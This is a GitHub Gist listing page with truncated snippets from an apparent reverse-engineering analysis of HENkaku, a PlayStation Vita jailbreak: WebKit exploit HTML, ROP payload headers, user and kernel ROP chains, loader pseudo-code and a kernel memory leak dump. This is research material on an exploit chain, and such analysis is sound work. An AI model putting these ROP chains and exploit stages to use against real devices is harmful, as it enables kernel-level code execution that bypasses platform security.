Skip to content

Instantly share code, notes, and snippets.

hexkyz

Block or report user

Report or block hexkyz

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@hexkyz
hexkyz / henkaku_index.html
Created Oct 19, 2016
HENkaku - Stage 1 (HTML code)
View henkaku_index.html
<script src='payload.js'></script>
<script>
var r, a, e, t, n, o, l, i, f, v, s, c;
var u, y, w, p, d, g, h, k, b;
var A, U;
var m = 0x40 + payload[16/4]; /* 0x40 bytes for ROP header + 1840 bytes for stack*/
m /= 4; /* 476 */
@hexkyz
hexkyz / henkaku_payload_bin.txt
Created Oct 19, 2016
HENkaku - Stage 1 (JS payload)
View henkaku_payload_bin.txt
[HEADER] (0x40 bytes)
0x524f507e -> ROP~
0x01000100 -> Version
0x00000000 -> NULL
0x00000000 -> NULL
0x00000730 -> No reloc
0x00000000 -> NULL
0x00000000 -> NULL
0x00000000 -> NULL
0x000003F8 -> No reloc
@hexkyz
hexkyz / henkaku_stage3_krop.txt
Created Oct 19, 2016
HENkaku - Stage 3 (Kernel ROP)
View henkaku_stage3_krop.txt
// Kernel ROP chain
/*
scesysmem_base + 0x00000347
POP {PC}
*/
0x00(x_stack + 0x00008A8C) = scesysmem_base + 0x00000031 // PC
/*
scesysmem_base + 0x00000031
POP {R0,PC}
@hexkyz
hexkyz / henkaku_stage2.c
Last active Oct 19, 2016
HENkaku - Stage 2
View henkaku_stage2.c
// Copy SD card device path and param
strcpy(x_stack + 0x000086B4, "sdstor0:");
strcpy(x_stack + 0x000086CC, "xmc-lp-ign-userext");
// Clear devctl 0x05 outbuf
// From x_stack + 0x00006F34 to x_stack + 0x00007334
memset(x_stack + 0x00006F34, 0x00000000, 0x00000400);
// Copy dummy device path
strcpy(x_stack + 0x000086E4, "molecule0:");
@hexkyz
hexkyz / henkaku_stage2_partial.c
Last active Oct 19, 2016
HENkaku - Stage 1 (Pre-analysis of stage 2)
View henkaku_stage2_partial.c
strcpy(stack_base + 0x000086B4, "sdstor0:");
strcpy(stack_base + 0x000086CC, "xmc-lp-ign-userext");
// Do stuff
...
strcpy(stack_base + 0x000086E4, "molecule0:");
SceLibKernel_a4ad("molecule0:");
SceLibKernel_a55d("sdstor0:", 0x00000005, "xmc-lp-ign-userext", 0x00000014);
@hexkyz
hexkyz / henkaku_http_loader.c
Last active Oct 19, 2016
HENkaku - Stage 1 (HTTP loader)
View henkaku_http_loader.c
// Do stuff
...
// Create a new thread for the second payload
int thread_id = sceKernelCreateThread("st2", SceWebkit_base + 0x000054C8, 0x10000100, 0x00600000, 0x00000000, 0x00000000, 0x00000000);
// Do stuff
...
// Construct the arguments for fetching the second payload
@hexkyz
hexkyz / henkaku_stage3_pseudocode.c
Created Oct 19, 2016
HENkaku - Stage 3 (Pseudo-code)
View henkaku_stage3_pseudocode.c
// Allocate a new memory block
char* memblock_name = "Magic";
uint32_t memblock_type = 0x1020D006;
uint32_t memblock_size = 0xA0000;
void* memblock_opts = 0x00000000;
uint32_t memblock_id = kern_memblock_alloc(memblock_name, memblock_type, memblock_size, memblock_opts, 0);
// Retrieve the memory block's address into a buffer
uint32_t *out_buf;
kern_memblock_getaddr(memblock_id, out_buf);
@hexkyz
hexkyz / henkaku_stage3_kxloader.c
Created Oct 19, 2016
HENkaku - Stage 3 (Kernel loader)
View henkaku_stage3_kxloader.c
// Entry point
sub_00000010(scesysmem_base, payload_addr)
{
r4 = scesysmem_base
sub_00000356();
r5 = scesysmem_base >> 0x20
sub_0000035A();
// Decrypt and launch HENkaku's payload
@hexkyz
hexkyz / henkaku_stage2_rop.txt
Created Oct 19, 2016
HENkaku - Stage 2 (ROP chain)
View henkaku_stage2_rop.txt
0x00(x_stack + 0x00008A8C) = scesysmem_base + 0x00000031
0x00(x_stack + 0x00008A90) = 0x08106803
0x00(x_stack + 0x00008A94) = scesysmem_base + 0x0001EFF1
0x00(x_stack + 0x00008A98) = 0x00000038
0x00(x_stack + 0x00008A9C) = scesysmem_base + 0x0001EFE1
0x00(x_stack + 0x00008AA0) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008AA4) = scesysmem_base + 0x000039EB
0x00(x_stack + 0x00008AA8) = scesysmem_base + 0x0001B571
0x00(x_stack + 0x00008AAC) = 0x00000000
0x00(x_stack + 0x00008AB0) = scesysmem_base + 0x00001E43
View sceIoDevctl_leak_1.50.txt
0x00000000: 00 02 20 9F 80 05 08 00 E0 59 00 00 97 11 49 00
0x00000010: A8 05 30 00 80 05 08 00 00 00 00 00 09 50 49 00
0x00000020: 00 C9 21 00 00 C9 21 00 C0 8B 21 00 80 A5 21 00
0x00000030: C0 8B 21 00 80 A5 21 00 00 B2 20 00 C0 65 20 00
0x00000040: 00 B2 20 00 C0 65 20 00 C0 65 20 00 C0 65 20 00
0x00000050: C0 65 20 00 C0 65 20 00 C0 21 20 00 C0 65 20 00
0x00000060: C0 21 20 00 C0 65 20 00 00 47 20 00 00 47 20 00
0x00000070: 00 47 20 00 00 47 20 00 C0 95 20 00 00 47 20 00
0x00000080: C0 95 20 00 00 47 20 00 40 0B 20 00 40 0B 20 00
0x00000090: 40 0B 20 00 40 0B 20 00 40 31 20 00 40 0B 20 00
You can’t perform that action at this time.